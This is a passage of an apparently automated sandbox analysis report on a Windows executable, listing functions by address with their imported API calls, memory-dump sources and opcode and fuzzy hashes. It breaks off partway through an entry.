                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 23d5af7176ad5a520695a1ffeecd510cc8fef778860d80356fd0c6e0421d5d76
                    • Instruction ID: d36c52374a0e0fcd10c9bc5037e0df31f7a687755886ef60fb5ea217cb93ed6b
                    • Opcode Fuzzy Hash: 23d5af7176ad5a520695a1ffeecd510cc8fef778860d80356fd0c6e0421d5d76
                    • Instruction Fuzzy Hash: 1D317F72201614FFEB218F50DC4AFEA3FA9EF09761F044265FE08DA291DA799C51CB64
                    Function 006DC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 011b2a68cb560c15370468c76da49e389839e4283477c40c8f1da59795d5bcb3
                    • Instruction ID: da87306cf986ea0d10aa641d10248e0f36979902da3740e7b23e0f03f6f32f52
                    • Opcode Fuzzy Hash: 011b2a68cb560c15370468c76da49e389839e4283477c40c8f1da59795d5bcb3
                    • Instruction Fuzzy Hash: 4621A4B1A4021AB6D750B6249C42FFB235F9E123B4F084016FD05D6383EA56ED22C6A9
                    Function 006EED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                    • _wcstok.LIBCMT ref: 006EEEFF
                    • _wcscpy.LIBCMT ref: 006EEF8E
                    • _memset.LIBCMT ref: 006EEFC1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    • Opcode ID: ed2b2f237589332a516c25ae1d706e93e7e20e8cb6555adb583a29d47bfac3f9
                    • Instruction ID: d0b9cb3a9c7e21ceb73e6a01a94d660f27898bcfcb832a339a7c137d0d2c1227
                    • Opcode Fuzzy Hash: ed2b2f237589332a516c25ae1d706e93e7e20e8cb6555adb583a29d47bfac3f9
                    • Instruction Fuzzy Hash: 78C191315083409FC764FF24C881AAAB7E2BF85314F144A2DF899973A2DB70ED45CB96
                    Function 00681424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b680a17f47b7614445236621a8b73de358d5283886a626113c85b34ace5f9027
                    • Instruction ID: eeba21e5df93a18895e30acabfb38c73b5a726aab761aa5e940878160eec5091
                    • Opcode Fuzzy Hash: b680a17f47b7614445236621a8b73de358d5283886a626113c85b34ace5f9027
                    • Instruction Fuzzy Hash: D7717F70900109EFCB14EF58CC45AFEBBBAFF86314F148259F915AA251C774AA52CFA4
                    Function 006F6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37c16fcb99c9ad07bb2de8d4b8a4ca1b2034ca98fd53e6ce3dc64f31d0522715
                    • Instruction ID: 29f6c517cd7f3ab6bbb350748784aa5a6e335b30787b7ba00e7060f024f3a329
                    • Opcode Fuzzy Hash: 37c16fcb99c9ad07bb2de8d4b8a4ca1b2034ca98fd53e6ce3dc64f31d0522715
                    • Instruction Fuzzy Hash: 3461DE71508304ABC750EB24CC86E7FB3EAAF84714F544A1DF64697292DF70AD01C7A6
                    Function 0070B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                    Download Yara Rule
                    APIs
                    • IsWindow.USER32(00CD5738), ref: 0070B6A5
                    • IsWindowEnabled.USER32(00CD5738), ref: 0070B6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0070B795
                    • SendMessageW.USER32(00CD5738,000000B0,?,?), ref: 0070B7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 0070B809
                    • GetWindowLongW.USER32(00CD5738,000000EC), ref: 0070B82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0070B843
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    • Opcode ID: 01a9abdd60c975599efd9b4f4b018520579c200822bad8a6cee5097010c82832
                    • Instruction ID: ee9ac87522dd4c7e68f0e69f038b5142300482d951fc92ff96d22487d0e25932
                    • Opcode Fuzzy Hash: 01a9abdd60c975599efd9b4f4b018520579c200822bad8a6cee5097010c82832
                    • Instruction Fuzzy Hash: C0719F34600204EFDB21DF64C8A4FBA7BF9EF5A300F14426AE945973E1C73AAA51DB54
                    Function 006FF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006FF75C
                    • _memset.LIBCMT ref: 006FF825
                    • ShellExecuteExW.SHELL32(?), ref: 006FF86A
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 006FF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 006FF910
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    • Opcode ID: 56ef66abd00cea7c8a857552677a8d87ad20070ee7c40c97be28d63496ba43cb
                    • Instruction ID: 531c6b0398413f31ddd99f497c7569ffe8c2f1588791349c588b78c1582dba2a
                    • Opcode Fuzzy Hash: 56ef66abd00cea7c8a857552677a8d87ad20070ee7c40c97be28d63496ba43cb
                    • Instruction Fuzzy Hash: 50618B75A00619DFCF14EF94C5809AEBBF6FF48310B18856DE956AB351CB30AD41CB98
                    Function 006E145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(?), ref: 006E149C
                    • GetKeyboardState.USER32(?), ref: 006E14B1
                    • SetKeyboardState.USER32(?), ref: 006E1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 006E1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 006E155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 006E15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006E15C8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: cb1d7a4dd00dcf8ab41edb328483c08a8f3e955edefb85a86f038a18c99f24a0
                    • Instruction ID: c6dfa8292851d8a39c68e20164b5f237dab677a2f1593b0a253e845e2957b05e
                    • Opcode Fuzzy Hash: cb1d7a4dd00dcf8ab41edb328483c08a8f3e955edefb85a86f038a18c99f24a0
                    • Instruction Fuzzy Hash: E851E3B06057D57EFB3246268C45BFABFEA6B47304F08858DE1D54E9C2D2A89C84E750
                    Function 006E1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32(00000000), ref: 006E12B5
                    • GetKeyboardState.USER32(?), ref: 006E12CA
                    • SetKeyboardState.USER32(?), ref: 006E132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006E1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006E1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006E13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006E13D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: f38596e171dea9ee083a0ada3270be109087018d803f72f8c6d80e68f3aed88c
                    • Instruction ID: 1d215f4637a176da10f679fd91b3d4df2471e14e014c0ccb86851e1b85f55d05
                    • Opcode Fuzzy Hash: f38596e171dea9ee083a0ada3270be109087018d803f72f8c6d80e68f3aed88c
                    • Instruction Fuzzy Hash: 225102B05067D57DFB3287268C05BFABEAA5B07300F088589E1D44EAC2D7A5AC98F754
                    Function 006E589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    • Opcode ID: e4812f00bd8f984115fc1f870f22cab8830f4a572c5ec4d565913fcdfdefc76b
                    • Instruction ID: 90ee98b003315fc3504cc818a49346a28580c0a270749565980f572c210fa3fb
                    • Opcode Fuzzy Hash: e4812f00bd8f984115fc1f870f22cab8830f4a572c5ec4d565913fcdfdefc76b
                    • Instruction Fuzzy Hash: C641EAA5C2125476CB50F7B5CC869CFB7AAAF06310F508466F515E3221E734EB44CBAD
                    Function 006E38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006E38D3,?), ref: 006E48C7
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006E38D3,?), ref: 006E48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 006E38F3
                    • _wcscmp.LIBCMT ref: 006E390F
                    • MoveFileW.KERNEL32(?,?), ref: 006E3927
                    • _wcscat.LIBCMT ref: 006E396F
                    • SHFileOperationW.SHELL32(?), ref: 006E39DB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    • Opcode ID: bf2a0ed65375724871004ad611c79af6aa5c45b56a3ac205d4d088665855eb1e
                    • Instruction ID: 5fed0eb2227f749cfe51151583b754a2fffc7ec81d559721a54b19361c015b3d
                    • Opcode Fuzzy Hash: bf2a0ed65375724871004ad611c79af6aa5c45b56a3ac205d4d088665855eb1e
                    • Instruction Fuzzy Hash: B84193B14093849EC791EF65C4859DFB7E9AF89340F10092EF489C3252EB74D689CB56
                    Function 00707500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00707519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007075C0
                    • IsMenu.USER32(?), ref: 007075D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00707620
                    • DrawMenuBar.USER32 ref: 00707633
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    • Opcode ID: 9f6bce8338a16960faf1da6757cc9b7698aaa9704932290b505a971d6d41f427
                    • Instruction ID: 146ef246f11e0fc2c768845c3e5c6297caf6e08a3f8beea9bf385bc07d451847
                    • Opcode Fuzzy Hash: 9f6bce8338a16960faf1da6757cc9b7698aaa9704932290b505a971d6d41f427
                    • Instruction Fuzzy Hash: 20414775A04609EFDB24DF54D884E9ABBF9FB09314F048229E91697290D739AD50CFA0
                    Function 0070122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0070125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00701286
                    • FreeLibrary.KERNEL32(00000000), ref: 0070133D
                      • Part of subcall function 0070122D: RegCloseKey.ADVAPI32(?), ref: 007012A3
                      • Part of subcall function 0070122D: FreeLibrary.KERNEL32(?), ref: 007012F5
                      • Part of subcall function 0070122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00701318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 007012E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: 0ec0832183f103c76da7ce69b8561bfe4b19726be19eaad1b4728e361c2a5349
                    • Instruction ID: 98ab878f02d760fb4aab27699d61f760670afa763056b2f821fbfc8961e50e7d
                    • Opcode Fuzzy Hash: 0ec0832183f103c76da7ce69b8561bfe4b19726be19eaad1b4728e361c2a5349
                    • Instruction Fuzzy Hash: F9310D71901119FFDB15DB90DC89AFEB7BCFF08300F404269E501E2591EA789E859BA4
                    Function 0070653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0070655B
                    • GetWindowLongW.USER32(00CD5738,000000F0), ref: 0070658E
                    • GetWindowLongW.USER32(00CD5738,000000F0), ref: 007065C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007065F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0070661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00706630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0070664A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 2d46430a517aeaa285205090666ec0c23f65346981d7e6d7a83f5a9661a58054
                    • Instruction ID: a0759f5332766747106d816faca37c9d2aeb5889c56213084f9a5e641365e733
                    • Opcode Fuzzy Hash: 2d46430a517aeaa285205090666ec0c23f65346981d7e6d7a83f5a9661a58054
                    • Instruction Fuzzy Hash: 2E310F34604210EFDB208F28DC95F553BE6BB4A710F1842A9F6118B2F6CB7AE8609B45
                    Function 006F6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006F80CB
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006F64D9
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F64E8
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006F6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 006F652A
                    • WSAGetLastError.WSOCK32 ref: 006F6534
                    • closesocket.WSOCK32(00000000), ref: 006F655D
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006F6576
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    • Opcode ID: c57b5edb61a9b3a85deef474ba0d1f8ce1292b7109301f4dbdcea9e2b95179a9
                    • Instruction ID: 53a98ce47d312191208020c2a1ed24d14344161490c2984d791e576c7b432162
                    • Opcode Fuzzy Hash: c57b5edb61a9b3a85deef474ba0d1f8ce1292b7109301f4dbdcea9e2b95179a9
                    • Instruction Fuzzy Hash: 8531B331600118AFDB10AF64CC85BBE7BEAEB44714F04816DFA06E7291CB74AD05CBA5
                    Function 006DE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006DE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006DE120
                    • SysAllocString.OLEAUT32(00000000), ref: 006DE123
                    • SysAllocString.OLEAUT32 ref: 006DE144
                    • SysFreeString.OLEAUT32 ref: 006DE14D
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 006DE167
                    • SysAllocString.OLEAUT32(?), ref: 006DE175
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: d716258db436c0acfba647e3a314c47e205918d95fcbf2ca68bee43aa5b246fa
                    • Instruction ID: 600e66561ecb5d7402792d0afcade36126f343f42996f9520b8c11e60622bf3c
                    • Opcode Fuzzy Hash: d716258db436c0acfba647e3a314c47e205918d95fcbf2ca68bee43aa5b246fa
                    • Instruction Fuzzy Hash: B6213735A04108EFDB10BFA8DC88DAB77ADEB09760B108226F915CB760DA75DC41CB64
                    Function 0070783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00681D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00681D73
                      • Part of subcall function 00681D35: GetStockObject.GDI32(00000011), ref: 00681D87
                      • Part of subcall function 00681D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00681D91
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007078A1
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007078AE
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007078B9
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007078C8
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007078D4
                    Strings
                    Memory Dump Source
